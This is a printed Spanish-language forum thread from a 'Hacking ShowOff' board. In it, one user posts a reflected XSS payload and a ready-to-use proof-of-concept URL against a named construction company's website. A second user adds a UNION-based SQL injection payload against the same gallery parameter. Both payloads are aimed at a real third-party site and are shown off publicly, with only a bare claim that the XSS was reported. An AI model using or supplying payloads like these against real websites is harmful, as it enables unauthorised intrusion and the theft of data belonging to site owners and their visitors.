Imprimir Página - [XSS] Dynasty Builders - http://www.dynastybuilders.ca/

Título: [XSS] Dynasty Builders - http://www.dynastybuilders.ca/
Publicado por: Drok3r en Julio 22, 2018, 07:53:09 PM

Captura de pantalla
(https://i.imgur.com/ZSqRz1Y.png)

Url del sitio

http://www.dynastybuilders.ca

Vector
Archivo y Parametro: custom-gallery.php?id=
Payload XSS: '"><script>alert(/Drok3r - XSS /)</script>
PoC:
----> http://www.dynastybuilders.ca/custom-gallery.php?id=33%27%22%3E%3Cscript%3Ealert(/Drok3r%20-%20XSS%20/)%3C/script%3E (http://www.dynastybuilders.ca/custom-gallery.php?id=33%27%22%3E%3Cscript%3Ealert(/Drok3r%20-%20XSS%20/)%3C/script%3E)

Autor
[!] Drok3r (redbirdTEAM - CiberSecurityRECON)

Reportado: SI

Título: Re:[XSS] Dynasty Builders - http://www.dynastybuilders.ca/
Publicado por: Nobody en Julio 22, 2018, 11:10:22 PM

¡Hola Drok3r!

Excelente XSS, pero te comento que la web también es vulnerable a SQLi, por si no lo has notado.

Payload: http://www.dynastybuilders.ca/custom-gallery.php?id=' union select 1,version(),3,4,5,6,7,8,9,10,11 -- -

¡Saludos!

Título: Re:[XSS] Dynasty Builders - http://www.dynastybuilders.ca/
Publicado por: Drok3r en Julio 26, 2018, 06:52:34 PM

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
¡Hola Drok3r!

Excelente XSS, pero te comento que la web también es vulnerable a SQLi, por si no lo has notado.

Payload: http://www.dynastybuilders.ca/custom-gallery.php?id=' union select 1,version(),3,4,5,6,7,8,9,10,11 -- -

¡Saludos!

Aaaa que cosas.... jeje Gracias por el dato.

Underc0de

[In]Seguridad Informática => Bugs y Exploits => Hacking ShowOff => Mensaje iniciado por: Drok3r en Julio 22, 2018, 07:53:09 PM